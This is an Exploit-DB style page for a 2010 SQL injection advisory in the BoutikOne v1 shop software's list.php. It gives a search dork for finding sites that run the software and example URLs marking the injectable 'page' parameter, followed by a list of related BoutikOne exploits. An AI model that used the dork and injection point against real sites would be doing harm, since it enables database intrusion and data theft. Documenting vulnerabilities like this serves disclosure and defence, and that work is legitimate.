________ _____________ / /_ / ___/ _ \/ ___/ ___/ _ \/ __/ (__ ) __/ /__/ / / __/ /_ /____/\___/\___/_/ \___/\__/ ##################################################################### # Exploit Title: BoutikOne® v1 (list.php) SQL Injection Vulnerabilitie # Date: 19/09/2010 # Author: BrOx-Dz # Author: E.dz@hotmail.fr # Software Link: http://www.boutikone.com/ # Dork : Powered by BoutikOne® # Version: BoutikOne® # Tested on: windows xp pack 3 ##################################################################### ---------------------------------------------------------------------------- #e.g : http://server/patch/list.php?lang=1&path=50&num=38&action=n&sort=Id&page=0[sql] #demo : http://www.site.com/list.php?lang=1&path=42&num=13&action=n&sort=Id&page=0' ---------------------------------------------------------------------------- greatez: lagripe-dz mca_crb amine halim all dz members. www.sec4ever.com / www.v4-team.com/cc/ / www.h4ckforu.com/vb/.
Related Exploits
Trying to match CVEs (1): CVE-2010-3479Trying to match OSVDBs (1): 68193
Other Possible E-DB Search Terms: BoutikOne 1.0, BoutikOne
Date | D | V | Title | Author |
---|---|---|---|---|
2011-03-05 |
![]() |
BoutikOne - 'description.php' SQL Injection | IRAQ_JAGUAR | |
2008-11-17 |
![]() |
BoutikOne CMS - 'search_query' Cross-Site Scripting | d3v1l | |
2011-03-14 |
![]() |
BoutikOne - 'categorie.php?path' SQL Injection | cdx.security | |
2011-03-14 |
![]() |
BoutikOne - 'list.php?path' SQL Injection | cdx.security | |
2011-03-14 |
![]() |
BoutikOne - 'rss_flash.php?lang' SQL Injection | cdx.security | |
2011-03-14 |
![]() |
BoutikOne - 'rss_news.php?lang' SQL Injection | cdx.security | |
2011-03-14 |
![]() |
BoutikOne - 'rss_promo.php?lang' SQL Injection | cdx.security | |
2011-03-14 |
![]() |
BoutikOne - 'rss_top10.php?lang' SQL Injection | cdx.security | |
2011-03-14 |
![]() |
BoutikOne - 'search.php' Multiple SQL Injections | cdx.security |